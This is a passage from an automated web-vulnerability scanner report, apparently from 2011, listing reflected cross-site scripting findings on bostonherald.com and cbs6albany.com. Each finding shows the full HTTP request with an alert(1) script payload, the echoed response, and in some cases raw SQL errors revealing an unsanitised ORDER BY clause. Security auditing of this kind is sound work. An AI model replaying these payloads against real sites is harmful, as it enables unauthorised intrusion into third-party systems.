RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 02:34:54 GMT Server: Apache X-Powered-By: PHP/5.2.0-8+etch16 Content-Length: 397 Content-Type: text/html; charset=UTF-8 Connection: close
SQL: SELECT a.* FROM `suffolkData` a WHERE 1=1 ORDER BY ?a52a7'-alert(1)-'3fe2c2f08cd=1 LIMIT 0,20
Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?a52a7'-alert(1)-'3fe2c2f08cd=1 LIMIT 0,20' at line 1<br> ...[SNIP]...
4.810. http://www.bostonherald.com/projects/payroll/suffolk/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.bostonherald.com
Path:
/projects/payroll/suffolk/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 48b0d(a)6246e4e221 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /projects/payroll/suffolk/?48b0d(a)6246e4e221=1 HTTP/1.1 Host: www.bostonherald.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 02:34:55 GMT Server: Apache X-Powered-By: PHP/5.2.0-8+etch16 Content-Length: 367 Content-Type: text/html; charset=UTF-8 Connection: close
SQL: SELECT a.* FROM `suffolkData` a WHERE 1=1 ORDER BY ?48b0d(a)6246e4e221=1 LIMIT 0,20
Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?48b0d(a)6246e4e221=1 LIMIT 0,20' at line 1 ...[SNIP]...
4.811. http://www.bostonherald.com/projects/payroll/worcester/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.bostonherald.com
Path:
/projects/payroll/worcester/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e29cc'-alert(1)-'a2f2f71b2c7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /projects/payroll/worcester/?e29cc'-alert(1)-'a2f2f71b2c7=1 HTTP/1.1 Host: www.bostonherald.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 02:42:11 GMT Server: Apache X-Powered-By: PHP/5.2.0-8+etch16 Content-Length: 401 Content-Type: text/html; charset=UTF-8 Connection: close
SQL: SELECT a.* FROM `worcesterData` a WHERE 1=1 ORDER BY ?e29cc'-alert(1)-'a2f2f71b2c7=1 LIMIT 0,20
Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?e29cc'-alert(1)-'a2f2f71b2c7=1 LIMIT 0,20' at line 1<br> ...[SNIP]...
4.812. http://www.bostonherald.com/projects/payroll/worcester/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.bostonherald.com
Path:
/projects/payroll/worcester/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload f4ac7(a)0dc08ce248a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /projects/payroll/worcester/?f4ac7(a)0dc08ce248a=1 HTTP/1.1 Host: www.bostonherald.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 02:42:15 GMT Server: Apache X-Powered-By: PHP/5.2.0-8+etch16 Content-Length: 374 Content-Type: text/html; charset=UTF-8 Connection: close
SQL: SELECT a.* FROM `worcesterData` a WHERE 1=1 ORDER BY ?f4ac7(a)0dc08ce248a=1 LIMIT 0,20
Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?f4ac7(a)0dc08ce248a=1 LIMIT 0,20' at line ...[SNIP]...
The value of the topic request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c2820"><script>alert(1)</script>647d2a3054 was submitted in the topic parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /search/?topic=Rep.+James+Valleec2820"><script>alert(1)</script>647d2a3054&srvc=home&position=0 HTTP/1.1 Host: www.bostonherald.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 04:08:02 GMT Server: Apache X-Powered-By: PHP/5.2.0-8+etch16 Content-Type: text/html; charset=UTF-8 Connection: close Content-Length: 32149
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" > <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" > <head> <!-- // generic_TOP.tmpl // --> ...[SNIP]... <input class="mainSearchinut" id="searchInput" type="text" value="Rep. James Valleec2820"><script>alert(1)</script>647d2a3054" name="topic" /> ...[SNIP]...
The value of the topic request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 60651</script><script>alert(1)</script>03fb46f749a was submitted in the topic parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /search/?topic=Rep.+James+Vallee60651</script><script>alert(1)</script>03fb46f749a&srvc=home&position=0 HTTP/1.1 Host: www.bostonherald.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 04:08:47 GMT Server: Apache X-Powered-By: PHP/5.2.0-8+etch16 Content-Type: text/html; charset=UTF-8 Connection: close Content-Length: 32174
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload a4e73'><script>alert(1)</script>3aa125e23eb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /albany-communitya4e73'><script>alert(1)</script>3aa125e23eb/ HTTP/1.1 Host: www.cbs6albany.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 04:35:03 GMT Server: Apache Cache-Control: max-age=600 Expires: Sat, 29 Jan 2011 04:45:03 GMT Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html Content-Length: 43346
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> ...[SNIP]... <a href='/albany-communitya4e73'><script>alert(1)</script>3aa125e23eb/'> ...[SNIP]...
4.816. http://www.cbs6albany.com/albany-community/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.cbs6albany.com
Path:
/albany-community/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d2433'><script>alert(1)</script>1aa9284fca0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /albany-community/?d2433'><script>alert(1)</script>1aa9284fca0=1 HTTP/1.1 Host: www.cbs6albany.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 04:34:10 GMT Server: Apache Cache-Control: max-age=600 Expires: Sat, 29 Jan 2011 04:44:10 GMT Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html Content-Length: 43349
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> ...[SNIP]... <a href='/albany-community/?d2433'><script>alert(1)</script>1aa9284fca0=1'> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 75854'><script>alert(1)</script>1f82ca7f1ce was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /albany-tv-programming75854'><script>alert(1)</script>1f82ca7f1ce/ HTTP/1.1 Host: www.cbs6albany.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 04:34:54 GMT Server: Apache Cache-Control: max-age=600 Expires: Sat, 29 Jan 2011 04:44:54 GMT Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html Content-Length: 42842
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> ...[SNIP]... <a href='/albany-tv-programming75854'><script>alert(1)</script>1f82ca7f1ce/'> ...[SNIP]...
4.818. http://www.cbs6albany.com/albany-tv-programming/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.cbs6albany.com
Path:
/albany-tv-programming/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 57577'><script>alert(1)</script>892855b7f8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /albany-tv-programming/?57577'><script>alert(1)</script>892855b7f8=1 HTTP/1.1 Host: www.cbs6albany.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 04:34:05 GMT Server: Apache Cache-Control: max-age=600 Expires: Sat, 29 Jan 2011 04:44:05 GMT Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html Content-Length: 42844
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> ...[SNIP]... <a href='/albany-tv-programming/?57577'><script>alert(1)</script>892855b7f8=1'> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 8cdf9'><script>alert(1)</script>9e8a6ed6891 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /albany-weather-forecast8cdf9'><script>alert(1)</script>9e8a6ed6891 HTTP/1.1 Host: www.cbs6albany.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 04:35:48 GMT Server: Apache Cache-Control: max-age=600 Expires: Sat, 29 Jan 2011 04:45:48 GMT Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html Content-Length: 55398
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> ...[SNIP]... <a href='/albany-weather-forecast8cdf9'><script>alert(1)</script>9e8a6ed6891'> ...[SNIP]...
4.820. http://www.cbs6albany.com/albany-weather-forecast [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.cbs6albany.com
Path:
/albany-weather-forecast
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload dec0c'><script>alert(1)</script>262a2c2a00e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /albany-weather-forecast?dec0c'><script>alert(1)</script>262a2c2a00e=1 HTTP/1.1 Host: www.cbs6albany.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 04:34:54 GMT Server: Apache Cache-Control: max-age=600 Expires: Sat, 29 Jan 2011 04:44:54 GMT Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html Content-Length: 55413
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> ...[SNIP]... <a href='/albany-weather-forecast?dec0c'><script>alert(1)</script>262a2c2a00e=1'> ...[SNIP]...
The value of the cat request parameter is copied into the HTML document as plain text between tags. The payload abbec<script>alert(1)</script>e73f5d44298 was submitted in the cat parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /common/archives/?cat=Movie+Reviewsabbec<script>alert(1)</script>e73f5d44298&db=fbi&template=movie.html HTTP/1.1 Host: www.cbs6albany.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 04:31:25 GMT Server: Apache Cache-Control: max-age=600 Expires: Sat, 29 Jan 2011 04:41:25 GMT Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html Content-Length: 24964
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head>
The value of the cat request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8a1e6"><script>alert(1)</script>604e981a33a was submitted in the cat parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /common/archives/?cat=Movie+Reviews8a1e6"><script>alert(1)</script>604e981a33a&db=fbi&template=movie.html HTTP/1.1 Host: www.cbs6albany.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 04:31:14 GMT Server: Apache Cache-Control: max-age=600 Expires: Sat, 29 Jan 2011 04:41:14 GMT Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html Content-Length: 24974
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head>
The value of the cat request parameter is copied into the HTML document as text between TITLE tags. The payload a03b2</title><script>alert(1)</script>e15addb93fd was submitted in the cat parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /common/archives/?cat=Movie+Reviewsa03b2</title><script>alert(1)</script>e15addb93fd&db=fbi&template=movie.html HTTP/1.1 Host: www.cbs6albany.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 04:31:36 GMT Server: Apache Cache-Control: max-age=600 Expires: Sat, 29 Jan 2011 04:41:36 GMT Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html Content-Length: 25004
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head>
The value of the db request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fc8ee"><script>alert(1)</script>d814807c00f was submitted in the db parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /common/archives/?cat=Movie+Reviews&db=fbifc8ee"><script>alert(1)</script>d814807c00f&template=movie.html HTTP/1.1 Host: www.cbs6albany.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 04:31:57 GMT Server: Apache Cache-Control: max-age=600 Expires: Sat, 29 Jan 2011 04:41:57 GMT Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html Content-Length: 24802
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head>
The value of the css request parameter is copied into the HTML document as plain text between tags. The payload 923ab<script>alert(1)</script>1fc4a4d87cc was submitted in the css parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
